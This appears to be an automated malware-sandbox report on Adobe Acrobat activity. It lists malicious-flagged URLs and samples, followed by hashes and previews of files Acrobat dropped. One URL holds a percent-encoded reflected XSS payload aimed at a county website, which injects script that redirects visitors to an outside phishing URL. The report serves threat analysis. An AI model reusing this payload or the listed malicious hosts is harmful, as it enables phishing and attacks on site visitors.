                                                                              28a2c9bd18a11de089ef85a160da29e4file.exeGet hashmaliciousCredential FlusherBrowse
                                                                              • 4.175.87.197
                                                                              • 184.28.90.27
                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                              • 4.175.87.197
                                                                              • 184.28.90.27
                                                                              http://www.sunsetsafaris.com.au//homeGet hashmaliciousUnknownBrowse
                                                                              • 4.175.87.197
                                                                              • 184.28.90.27
                                                                              https://akbb.kampanyakrediiislemleri.com/Get hashmaliciousUnknownBrowse
                                                                              • 4.175.87.197
                                                                              • 184.28.90.27
                                                                              http://0f46b0f46b.briandrakebooks.com/Get hashmaliciousUnknownBrowse
                                                                              • 4.175.87.197
                                                                              • 184.28.90.27
                                                                              https://73214625721684432150.duckdns.org/home.phpGet hashmaliciousUnknownBrowse
                                                                              • 4.175.87.197
                                                                              • 184.28.90.27
                                                                              http://fpnc.vnvrff.com/Get hashmaliciousUnknownBrowse
                                                                              • 4.175.87.197
                                                                              • 184.28.90.27
                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                              • 4.175.87.197
                                                                              • 184.28.90.27
                                                                              https://www.florenceco.org/offices/elected/solicitor/docket.php?area=florence%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%27%2C%27%73%3A%2F%2F%76%27%2C%27%61%75%6C%27%2C%27%74%64%6F%27%2C%27%72%65%73%2E%63%27%2C%27%6F%6D%2F%30%2F%27%2C%27%30%2F%30%2F%27%2C%27%34%33%66%66%27%2C%27%35%63%62%35%27%2C%27%63%36%27%2C%27%32%65%27%2C%27%32%66%38%64%31%27%2C%27%31%63%61%33%38%38%27%2C%27%65%34%37%35%62%36%27%2C%27%63%34%36%2F14/392-16513/1254-3178-27524%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3EGet hashmaliciousPhisherBrowse
                                                                              • 4.175.87.197
                                                                              • 184.28.90.27
                                                                              https://porn-app.com/download2Get hashmaliciousHTMLPhisherBrowse
                                                                              • 4.175.87.197
                                                                              • 184.28.90.27
                                                                              No context
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):292
                                                                              Entropy (8bit):5.178557040839988
                                                                              Encrypted:false
                                                                              SSDEEP:6:WHaQL+q2Pwkn2nKuAl9OmbnIFUt8BHkG1Zmw+BHJQLVkwOwkn2nKuAl9OmbjLJ:8byvYfHAahFUt8lN/+leR5JfHAaSJ
                                                                              MD5:CC73EC22FA78A65FE9D2BCDABC2204E5
                                                                              SHA1:71D81B2D52241B2D1FBC917896B8E9DCE7DB6F96
                                                                              SHA-256:C9E8BD1DD0816EDA9EFD9CD5177039AD2AABBCE215CA2C37768C87DB63548928
                                                                              SHA-512:EC0EABB766B733FE181E7A7EEEBAC3001A0325A17C69200C778A6F1DE8430DF398FBB435E8C36F6F637F6883881093E44B07158ED3FDF35E2FBEED5111E980CC
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:2024/10/02-21:13:25.072 14a8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/10/02-21:13:25.074 14a8 Recovering log #3.2024/10/02-21:13:25.075 14a8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):292
                                                                              Entropy (8bit):5.178557040839988
                                                                              Encrypted:false
                                                                              SSDEEP:6:WHaQL+q2Pwkn2nKuAl9OmbnIFUt8BHkG1Zmw+BHJQLVkwOwkn2nKuAl9OmbjLJ:8byvYfHAahFUt8lN/+leR5JfHAaSJ
                                                                              MD5:CC73EC22FA78A65FE9D2BCDABC2204E5
                                                                              SHA1:71D81B2D52241B2D1FBC917896B8E9DCE7DB6F96
                                                                              SHA-256:C9E8BD1DD0816EDA9EFD9CD5177039AD2AABBCE215CA2C37768C87DB63548928
                                                                              SHA-512:EC0EABB766B733FE181E7A7EEEBAC3001A0325A17C69200C778A6F1DE8430DF398FBB435E8C36F6F637F6883881093E44B07158ED3FDF35E2FBEED5111E980CC
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:2024/10/02-21:13:25.072 14a8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/10/02-21:13:25.074 14a8 Recovering log #3.2024/10/02-21:13:25.075 14a8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):336
                                                                              Entropy (8bit):5.144359299409471
                                                                              Encrypted:false
                                                                              SSDEEP:6:WH0h4q2Pwkn2nKuAl9Ombzo2jMGIFUt8BH8jJZmw+BH8jDkwOwkn2nKuAl9Ombzz:8u4vYfHAa8uFUt8l8jJ/+l8jD5JfHAaU
                                                                              MD5:7360A4BA8AC49B440CAA503AB431E132
                                                                              SHA1:0F0A75885BF1F840C74F030BB89000FA87CD989B
                                                                              SHA-256:FD7EFA608AEA6EE6F57A5968100629E5E73EA869199437EB644740FEE42D723A
                                                                              SHA-512:C7EC71AD41C3239A29EDE0E127064DB8813136D55297055197D3F87FB69A899409D2A3DE5EB20AC5919866BB472A537F21EF446516EFAAE2BDEFC9D364050965
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:2024/10/02-21:13:25.159 1bf0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/10/02-21:13:25.160 1bf0 Recovering log #3.2024/10/02-21:13:25.160 1bf0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):336
                                                                              Entropy (8bit):5.144359299409471
                                                                              Encrypted:false
                                                                              SSDEEP:6:WH0h4q2Pwkn2nKuAl9Ombzo2jMGIFUt8BH8jJZmw+BH8jDkwOwkn2nKuAl9Ombzz:8u4vYfHAa8uFUt8l8jJ/+l8jD5JfHAaU
                                                                              MD5:7360A4BA8AC49B440CAA503AB431E132
                                                                              SHA1:0F0A75885BF1F840C74F030BB89000FA87CD989B
                                                                              SHA-256:FD7EFA608AEA6EE6F57A5968100629E5E73EA869199437EB644740FEE42D723A
                                                                              SHA-512:C7EC71AD41C3239A29EDE0E127064DB8813136D55297055197D3F87FB69A899409D2A3DE5EB20AC5919866BB472A537F21EF446516EFAAE2BDEFC9D364050965
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:2024/10/02-21:13:25.159 1bf0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/10/02-21:13:25.160 1bf0 Recovering log #3.2024/10/02-21:13:25.160 1bf0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:JSON data
                                                                              Category:modified
                                                                              Size (bytes):475
                                                                              Entropy (8bit):4.962161278947849
                                                                              Encrypted:false
                                                                              SSDEEP:12:YH/um3RA8sqDMsBdOg2HAcaq3QYiubInP7E4T3y:Y2sRdsQdMHr3QYhbG7nby
                                                                              MD5:0133E0AC496258864FBD427825FA4550
                                                                              SHA1:0899C33421192819D7E2735E0E2CAEDC32E03EF6
                                                                              SHA-256:545793DF2FDFF833F129EB45EB864C0CE25332D70539BB3185F6D15EA30648B4
                                                                              SHA-512:2E822F39B8285571967650E1A279A69C9F16175FAEF1D7F64BD3AEFA89098B2E4968A7311A9913DE2689A944AC43DA80FEA72DB69309C8215241AE9E84C9CD23
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13372478017733543","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":123776},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):475
                                                                              Entropy (8bit):4.962161278947849
                                                                              Encrypted:false
                                                                              SSDEEP:12:YH/um3RA8sqDMsBdOg2HAcaq3QYiubInP7E4T3y:Y2sRdsQdMHr3QYhbG7nby
                                                                              MD5:0133E0AC496258864FBD427825FA4550
                                                                              SHA1:0899C33421192819D7E2735E0E2CAEDC32E03EF6
                                                                              SHA-256:545793DF2FDFF833F129EB45EB864C0CE25332D70539BB3185F6D15EA30648B4
                                                                              SHA-512:2E822F39B8285571967650E1A279A69C9F16175FAEF1D7F64BD3AEFA89098B2E4968A7311A9913DE2689A944AC43DA80FEA72DB69309C8215241AE9E84C9CD23
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13372478017733543","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":123776},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4730
                                                                              Entropy (8bit):5.249538532310237
                                                                              Encrypted:false
                                                                              SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo73YwwPwZ:etJCV4FiN/jTN/2r8Mta02fEhgO73gov
                                                                              MD5:797C5E9059A2AD2269C9DCC3EF29F946
                                                                              SHA1:7AB01C787B0131B2CA4519651C9235800F337166
                                                                              SHA-256:5B4AC62D942089E96ECC9D09601336C6B50A8A8F4FE59E903A90B4713D8B01E4
                                                                              SHA-512:EF82FE68323EA3E0E64BCE1289C5AE58808410AB731CB4DCC6955EA6AAC900994537D56DC097A0F86E084F0239BBA9283B64D5FA956CA866342D3FF50A80C363
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):324
                                                                              Entropy (8bit):5.18029601505849
                                                                              Encrypted:false
                                                                              SSDEEP:6:WH7D4q2Pwkn2nKuAl9OmbzNMxIFUt8BHxjJZmw+BHxjDkwOwkn2nKuAl9OmbzNMT:87D4vYfHAa8jFUt8lFJ/+lFD5JfHAa8E
                                                                              MD5:0C74B0704F210CF8615E003D6D42267D
                                                                              SHA1:999DB493A4A05DB1A99EBEE2B836226C7662F2B8
                                                                              SHA-256:B9EF2A2A9C6C4271377F50922FA2509D108173B45463B8E6DE5D25451CA3764A
                                                                              SHA-512:39469E8A1813B69363F91FEECFBF50B62658AFC2362FEA2BECD8B97700A094286550E09D80E03423B9300F51348E749B562DFBF67F8FA09D12030F4D081B3AFC
                                                                              Malicious:false
                                                                              Preview:2024/10/02-21:13:25.365 1bf0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/10/02-21:13:25.367 1bf0 Recovering log #3.2024/10/02-21:13:25.367 1bf0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):324
                                                                              Entropy (8bit):5.18029601505849
                                                                              Encrypted:false
                                                                              SSDEEP:6:WH7D4q2Pwkn2nKuAl9OmbzNMxIFUt8BHxjJZmw+BHxjDkwOwkn2nKuAl9OmbzNMT:87D4vYfHAa8jFUt8lFJ/+lFD5JfHAa8E
                                                                              MD5:0C74B0704F210CF8615E003D6D42267D
                                                                              SHA1:999DB493A4A05DB1A99EBEE2B836226C7662F2B8
                                                                              SHA-256:B9EF2A2A9C6C4271377F50922FA2509D108173B45463B8E6DE5D25451CA3764A
                                                                              SHA-512:39469E8A1813B69363F91FEECFBF50B62658AFC2362FEA2BECD8B97700A094286550E09D80E03423B9300F51348E749B562DFBF67F8FA09D12030F4D081B3AFC
                                                                              Malicious:false
                                                                              Preview:2024/10/02-21:13:25.365 1bf0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/10/02-21:13:25.367 1bf0 Recovering log #3.2024/10/02-21:13:25.367 1bf0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                              Category:dropped
                                                                              Size (bytes):65110
                                                                              Entropy (8bit):2.5937035431011277
                                                                              Encrypted:false
                                                                              SSDEEP:192:tIS86JoVVyyyyCvqQmuk0AnRXDXyyylE3ayyyjjS8pjjyyyyyIII4aWmIILUhaxG:Dy7DDSmWHt9P
                                                                              MD5:38BDB979E340655EE9B165BF91EACB70
                                                                              SHA1:E8A2D8307AB0C02BB6760D7FE20BB25CB7D63E52
                                                                              SHA-256:93B5E8EF0A828BBDF2477F6491E41FC4B1259285FB3101EE1B68996F99FF7077
                                                                              SHA-512:B4E34F8941588F83042AF5A6A6C1B95C8FF9268FAC7F8D3CF0B949C7BAB0314F7BD1851A2E2CFFDAC3EAD13826987AEF2BC89B1F03F065FADD810C5BE09C708F
                                                                              Malicious:false
                                                                              Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                              Category:dropped
                                                                              Size (bytes):86016
                                                                              Entropy (8bit):4.444876960718206
                                                                              Encrypted:false
                                                                              SSDEEP:384:yezci5tpiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:rKs3OazzU89UTTgUL
                                                                              MD5:A3902944A755BE3EA08DB4F7835E6197
                                                                              SHA1:72FDECB9F488A6B3D697F09DA79C8B72431F7C30
                                                                              SHA-256:38257706E8E23CC63A002582A217DDAEF2EA685F8255ADADA9389D2B5A123166
                                                                              SHA-512:61DAC93A000EB7AB80115DDA6891755A3426AAFFE934E47CA2FA8CB9B74045AC06883D3A3C5874D377BE62AC8426792B4847B59DC5584749DD235973DA971D2C
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:SQLite Rollback Journal
                                                                              Category:dropped
                                                                              Size (bytes):8720
                                                                              Entropy (8bit):3.773311608057493
                                                                              Encrypted:false
                                                                              SSDEEP:48:7Mop/E2ioyVxCioy9oWoy1Cwoy1wxKOioy1noy1AYoy1Wioy1hioybioyCYoy1nR:7zpjuxCF7jXKQtqKb9IVXEBodRBk4
                                                                              MD5:DD81A45E02E6F6F1C91EDCD615651542
                                                                              SHA1:F3F4E16DA63261F1A7F51649185F137FDD1AFF0A
                                                                              SHA-256:944C85849D3DD6FF04D25A356FA9E3726BA1B0756FFCD4A2ACDE35FF6B9AC873
                                                                              SHA-512:6BA30334C0DE28DE0A6CD01712C8D34E0E9E4718655E70FF784AC99E7079AF3027DFC0160E3A07F5CD141DC686F63BE820E6C9803EC7028F1A5219813C82DC63
                                                                              Malicious:false
                                                                              Preview:.... .c.....H..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:Certificate, Version=3
                                                                              Category:dropped
                                                                              Size (bytes):1391
                                                                              Entropy (8bit):7.705940075877404
                                                                              Encrypted:false
                                                                              SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                              MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                              SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                              SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                              SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                              Malicious:false
                                                                              Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                              Category:dropped
                                                                              Size (bytes):71954
                                                                              Entropy (8bit):7.996617769952133
                                                                              Encrypted:true
                                                                              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                              Malicious:false
                                                                              Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):192
                                                                              Entropy (8bit):2.756901573172974
                                                                              Encrypted:false
                                                                              SSDEEP:3:kkFklL3wQklfllXlE/HT8k/thllltNNX8RolJuRdxLlGB9lQRYwpDdt:kKXQkmT82rVNMa8RdWBwRd
                                                                              MD5:F123F2C3C376D681E607FDCB0FEB8D35
                                                                              SHA1:1D6C7E85F62AB672422F511DC455A49119BEAE19
                                                                              SHA-256:5E8F32BAD2E85E1E425CD82237625FFA1DE93184533C8CBA45699FCFCFD3FE0A
                                                                              SHA-512:05E937B89240B3B30412F4D3FA402215975CA8ADB1032DFE68397CFB451F3DA12EA9EFF5848F44DEDBB48D53780B4DC0C3D58DAACF5B68FBFBECC174CB5E4CEF
                                                                              Malicious:false
                                                                              Preview:p...... ........8..y1...(....................................................... ..........W.....Z..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:data
                                                                              Category:modified
                                                                              Size (bytes):290
                                                                              Entropy (8bit):2.9844219596585932
                                                                              Encrypted:false
                                                                              SSDEEP:6:kKGT9Usw9L+N+SkQlPlEGYRMY9z+4KlDA3RUe/:7D9LNkPlE99SNxAhUe/
                                                                              MD5:CC5390ABB6BDF5959A24AD887558D885
                                                                              SHA1:6362267DF873B3216A92BA931D3F3EF045D44AB6
                                                                              SHA-256:C89E8F01570E3513FD61131588631EBD9BA14CE35568AC2E21035F604C3312EB
                                                                              SHA-512:D5CE14E207F757B7E5EEAACBF9467645EBD508EF31C241A7FAF7F095B6936FC2B27D30FCD8BC1045136CD565F51B2AEBA54DA266A537A1388E8BA07F24C0E140
                                                                              Malicious:false
                                                                              Preview:p...... ..........0.1...(....................................................... ........G..@.......................h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):295
                                                                              Entropy (8bit):5.357710674705244
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXHQXHCDMTuVblKHVoZcg1vRcR0YGVBYeoAvJM3g98kUwPeUkwRe9:YvXKXAu1Zc0vTYVGMbLUkee9
                                                                              MD5:17DFBA92710E5BE6C3930902C29EFECB
                                                                              SHA1:4858288DBB581F23B5BE4DF305CAE8FFDB797DB8
                                                                              SHA-256:A01E957C7E528E7DA45336F67333CEE6FA93848C2932BDEA407DACDB327FC86D
                                                                              SHA-512:6C4A4F203229AB97774DF69EF70AE3B7FF501970162EC4907F6BF9C731A973B66C8BEBFD0C4E77F6D7C79B63D8360CD9CAABF9E9384E15A3923410A48F384BD7
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"052d130c-52fd-4466-a6cc-6c5cf7d590b7","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1728095250978,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):294
                                                                              Entropy (8bit):5.308101766014796
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXHQXHCDMTuVblKHVoZcg1vRcR0YGVBYeoAvJfBoTfXpnrPeUkwRe9:YvXKXAu1Zc0vTYVGWTfXcUkee9
                                                                              MD5:A8B6789E4C21C9F20C722E7793220DB1
                                                                              SHA1:0DEAEC74235048774CFCCF949EA3ED7133EF8564
                                                                              SHA-256:A862DE1E9ED680D08F3769B370521435A3E375421A03FDEF3376135E71B3C61D
                                                                              SHA-512:A3A8FC7AC4778DD881C587948B2E0955B33BBC9EFF8B5CA9205019A43670C49B0FEF68D3C97F2D64351E423F1BFD8F10B34AEF3300FFDFF010907B0D2CF4D17A
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"052d130c-52fd-4466-a6cc-6c5cf7d590b7","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1728095250978,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):294
                                                                              Entropy (8bit):5.284916312198925
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXHQXHCDMTuVblKHVoZcg1vRcR0YGVBYeoAvJfBD2G6UpnrPeUkwRe9:YvXKXAu1Zc0vTYVGR22cUkee9
                                                                              MD5:513A3B8548B2607C70F5D147760BEE27
                                                                              SHA1:0DB0BBEB9801DA116DDC7578C1D08F5A30D88A67
                                                                              SHA-256:8420C967E5DFC41500286E8EE0D08AE067ED48CCA49F710AD33C5A9FF841F84B
